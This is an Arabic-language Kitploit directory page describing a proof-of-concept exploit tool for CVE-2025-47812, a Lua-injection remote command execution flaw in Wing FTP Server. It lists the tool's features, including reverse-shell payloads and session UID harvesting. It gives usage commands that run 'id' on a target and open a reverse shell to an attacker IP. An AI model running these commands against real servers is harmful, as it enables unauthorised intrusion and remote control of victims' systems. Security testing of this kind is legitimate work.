Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WingFTP-CVE-2025-47812-illdeed — استغلال تنفيذ الأوامر عن بُعد لخادم Wing FTP (CVE-2025-47812) | Kitploit
أدوات/GitHubGitHub/ill-deed/wingftp-cve-2025-47812-illdeed
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubill-deed/wingftp-cve-2025-47812-illdeed

WingFTP-CVE-2025-47812-illdeed

استغلال تنفيذ الأوامر عن بُعد لخادم Wing FTP (CVE-2025-47812)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-47812 - استغلال ثغرة تنفيذ الأوامر في Wing FTP Server

يوفر هذا المستودع نموذجًا لإثبات المفهوم لاستغلال CVE-2025-47812، وهي ثغرة تنفيذ أوامر عن بُعد (RCE) في Wing FTP Server. يمكن للمهاجم حقن وتنفيذ أوامر نظام تعسفية مبنية على Lua عن طريق إساءة استخدام معامل username أثناء المصادقة، مما يؤدي إلى تنفيذ كامل للتعليمات البرمجية عن بُعد.


📌 ميزات الاستغلال

  • 🔧 تنفيذ أوامر شل مخصصة عن بُعد
  • 🧬 حمولات شل عكسية متعددة مدمجة (bash، Python، netcat، إلخ)
  • 🪪 استخراج تلقائي لـ UID من Set-Cookie
  • 📦 تسجيل UIDs الناجحة في found_uids.txt
  • 🧪 وضع المحاكاة (لا يتم إرسال طلبات فعلية — اختبر منطق الإدخال/الإخراج بأمان)
  • 🔁 منطق إعادة المحاولة عند فشل الشبكة
  • 🧹 تنسيق حمولة أنظف وإخراج قابل للقراءة
  • ✅ التحقق من صحة الإدخال لعناوين IP والمنافذ وعناوين URL
  • ⚙️ دعم وسيطات سطر الأوامر لسير العمل الآلي

💻 الاستخدام

تنفيذ أمر شل بسيط:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"

تشغيل شل عكسية:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444

وضع المحاكاة (لن يتم إرسال أي طلبات):

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run

🔄 التغييرات التي تم إجراؤها على الاستغلال الأصلي


⚠️ إخلاء المسؤولية

هذا المشروع مخصص للاختبارات الأمنية التعليمية والمصرح بها فقط. لا تستخدم هذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


تنزيل الأداة
الميزة/التحسينالوصف
✅ تحليل الوسيطاتتمت إضافة دعم CLI باستخدام argparse للوضع غير التفاعلي
🔐 التحقق من صحة الإدخاليضمن صحة عنوان URL/IP/المنفذ قبل محاولة الاستغلال
📦 إعادة هيكلة الرؤوستم استخراج رؤوس HTTP إلى دالة قابلة لإعادة الاستخدام للاتساق
📄 تسجيل UIDيحفظ رموز UID الناجحة في found_uids.txt
🧪 وضع المحاكاةيسمح بالاختبار الآمن دون إرسال طلبات (--dry-run)
🕒 المهلة + إعادة المحاولةيضيف مهلة للطلب ومحاولات إعادة تلقائية عند الفشل
🧼 قراءة الحمولةإعادة تنسيق سلسلة حقن Lua للوضوح والصيانة
📊 إخراج منظمتغليف استجابات الخادم ومعلومات الحمولة بمحددات لسهولة القراءة
⚠️ التحقق من رموز الحالةتحذير المستخدم إذا أعاد الهدف رموز حالة HTTP غير متوقعة
📝 نظام التسجيلاستبدال print() بوحدة logging في Python للتحكم الأفضل في مستوى التفاصيل